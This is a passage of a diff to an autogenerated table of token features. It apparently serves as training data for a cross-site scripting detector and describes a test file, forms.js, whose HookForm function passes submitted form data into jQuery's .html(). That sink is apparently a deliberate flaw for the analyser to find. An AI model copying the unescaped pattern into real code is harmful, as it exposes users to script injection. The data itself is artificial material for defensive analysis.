autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:11:70:18 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:21:70:32 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:35:70:40 | errors | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:52 | useForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:52 | useForm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:52 | useForm | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:52 | useForm | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:52 | useForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | exceptional return of useForm() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | exceptional return of useForm() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | exceptional return of useForm() | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | exceptional return of useForm() | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | exceptional return of useForm() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | useForm() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | useForm() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | useForm() | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | useForm() | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:70:46:70:54 | useForm() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:71:16 | onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:71:16 | onSubmit | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:71:16 | onSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:71:16 | onSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:71:16 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmi ... OK \\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmi ... OK \\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmi ... OK \\n } | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmi ... OK \\n } | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmi ... OK \\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:9:73:3 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | 'arguments' object of function onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | 'arguments' object of function onSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | 'arguments' object of function onSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | 'arguments' object of function onSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | 'arguments' object of function onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | (data) ... OK \\n } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | (data) ... OK \\n } | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | (data) ... OK \\n } | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | (data) ... OK \\n } | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | (data) ... OK \\n } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | exceptional return of function onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | exceptional return of function onSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | exceptional return of function onSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | exceptional return of function onSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | exceptional return of function onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | return of function onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | return of function onSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | return of function onSubmit | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | return of function onSubmit | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:20:73:3 | return of function onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:71:21:71:24 | data | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:5 | $ | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:5 | $ | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:5 | $ | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:5 | $ | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:5 | $ | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | $("#id") | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | $("#id") | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | $("#id") | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | exceptional return of $("#id") | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | exceptional return of $("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | exceptional return of $("#id") | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | exceptional return of $("#id") | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:12 | exceptional return of $("#id") | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:17 | $("#id").html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:17 | $("#id").html | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:17 | $("#id").html | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:17 | $("#id").html | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:17 | $("#id").html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | $("#id" ... a.name) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | $("#id" ... a.name) | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | $("#id" ... a.name) | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | $("#id" ... a.name) | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | $("#id" ... a.name) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | exceptional return of $("#id" ... a.name) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | exceptional return of $("#id" ... a.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | exceptional return of $("#id" ... a.name) | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | exceptional return of $("#id" ... a.name) | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:5:72:28 | exceptional return of $("#id" ... a.name) | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:72:7:72:11 | "#id" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/XssThroughDom/forms.js:72:7:72:11 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:72:7:72:11 | "#id" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24397,6 +160719,16 @@ tokenFeatures | autogenerated/Xss/XssThroughDom/forms.js:72:7:72:11 | "#id" | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | | autogenerated/Xss/XssThroughDom/forms.js:72:7:72:11 | "#id" | enclosingFunctionName | HookForm | | autogenerated/Xss/XssThroughDom/forms.js:72:7:72:11 | "#id" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:14:72:17 | html | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:14:72:17 | html | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:72:14:72:17 | html | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:14:72:17 | html | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:14:72:17 | html | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:72:19:72:22 | data | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:72:19:72:22 | data | contextSurroundingFunctionParameters | ()\n(data) | +| autogenerated/Xss/XssThroughDom/forms.js:72:19:72:22 | data | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:72:19:72:22 | data | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:72:19:72:22 | data | fileImports | formik react react-final-form react-hook-form | | autogenerated/Xss/XssThroughDom/forms.js:72:19:72:27 | data.name | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/XssThroughDom/forms.js:72:19:72:27 | data.name | InputArgumentIndex | 0 | | autogenerated/Xss/XssThroughDom/forms.js:72:19:72:27 | data.name | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | @@ -24404,6 +160736,57 @@ 